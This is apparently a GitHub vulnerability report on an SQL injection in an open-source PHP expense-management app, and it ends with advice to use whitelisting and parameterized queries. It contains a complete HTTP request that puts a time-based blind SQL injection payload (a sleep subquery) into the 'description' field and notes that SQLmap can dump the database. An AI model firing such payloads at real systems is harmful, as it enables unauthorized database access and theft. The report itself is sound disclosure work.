Vulnerability/BUG - SQL Injection while updating details. #1
Description
Hi
I found a SQL injection vulnerability in your Expense-Management-System
POST //Expense-Management-System-master/expense_action.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Origin: http://192.168.1.6
Connection: close
Referer: http://192.168.1.6//Expense-Management-System-master/
Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5
description=seafood'%2b(select*from(select(sleep(20)))a)%2b'&amount=3.21&date=2019-08-02&expense_id=2&action=Edit
Above query will only sleep database for 20 second but Using SQLmap bad user can dump the database as show in image.
Control -
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended.
Remediation -
To prevent this follow the following steps:
a) Validate all input data against a whitelist
b) Use of parameterized queries
String selectStatement = "SELECT * FROM User WHERE userId = ? ";
PreparedStatement prepStmt = con.prepareStatement(selectStatement);
prepStmt.setString(1, userId);
ResultSet rs = prepStmt.executeQuery();